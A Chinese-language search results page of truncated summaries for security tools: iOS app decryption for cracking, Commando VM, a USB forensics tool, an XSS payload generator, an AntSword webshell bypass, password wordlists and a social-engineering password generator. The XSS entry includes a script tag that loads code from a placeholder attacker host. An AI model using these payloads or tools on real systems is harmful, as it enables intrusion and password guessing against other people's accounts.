搜索 “gene”

frida-ios-dump 砸壳IPA frida-ios-dump基于frida提供的强大功能，通过注入js实现内存dump然后通过python自动拷贝到电脑生成IPA文件，可实现真正的一键dump砸壳IPA为实现破解IPA做准备。 frida-ios-dump使用 在手机和mac电脑上面安装fridasudo pip install -r requirements.txt --upgrade (Python 2.7)通过USB运行usbmuxd/ipr...

Commando VM CommandoVM 是一个完全可定制的，基于Windows的安全发行版，用于渗透测试和红队测试。在2019年3月28日发布了首个版本《火眼Windows渗透工具包 – CommandoVM》，现在，2.0版本来了。 Windows渗透工具包 Commando VM安装与使用 项目地址：https://github.com/fireeye/commando-vm 与1.0版本安装方法相同不赘述，请...

usbrip 取证工具 usbrip（源自“USB Ripper”，而不是“USB RIP”）是一个带有CLI界面的开源取证工具，可以让您在Linux机器上跟踪USB设备（即USB事件历史记录，“已连接”和“已断开连接”事件）。 USB取证工具 usbrip是用Python 3编写的软件，它解析Linux日志文件（/var/log/syslog*或/var/log/messages*）以构建USB事件历史表。此类表格...

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞：alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

蚁剑AntSword Bypass Disable Functions 在昨天，蚁剑AntSword更新了新姿势「Bypass Disable Functions」，提供了另一种攻击思路，我们来过一遍。 原理分析 基于蚁剑的 FastCGI/PHP-FPM 模式和 AntSword-Labs 5 环境。蚁剑在服务器上传了 1 个 so 库和一个.antproxy.php，看下.antproxy.php代码： ...

passpie：命令行密码管理器 Passpie是一个命令行工具，可以通过丰富多彩配置界面管理来自终端的密码。使用主密码来解密登录凭据，将密码复制到剪贴板，与git存储库同步，检查密码的状态等。 Passpie界面 密码文件使用GnuPG加密并保存到yaml文本文件中。Passpie支持Linux，MAC和Windows。 它是什么样子的？以下是一个简单的Passp...

收藏整理的渗透测试字典 字典内容已经去重 Port 出现频率较高的端口号，平时我是使用Telnet来扫描端口，就没有每个端口号进行换行。 User 主要是一些从网络上收集的用户密码字典。 /IDC_password/         # IDC 爆破密码/User_name/            # 用户名/User_pa...

社会工程学密码生成器 社会工程学密码生成器，是一个利用个人信息生成密码的工具，灵感源于亦思社会工程学字典生成器，但是该软件多年未更新，且生成的密码过少，故根据其构思重新做了一个。本工具根据个人信息生成大量相关密码，既可以用于猜解他人密码，也可以用于校验自己密码的安全强度。 社会工程学密码生成器 它根据输入的个...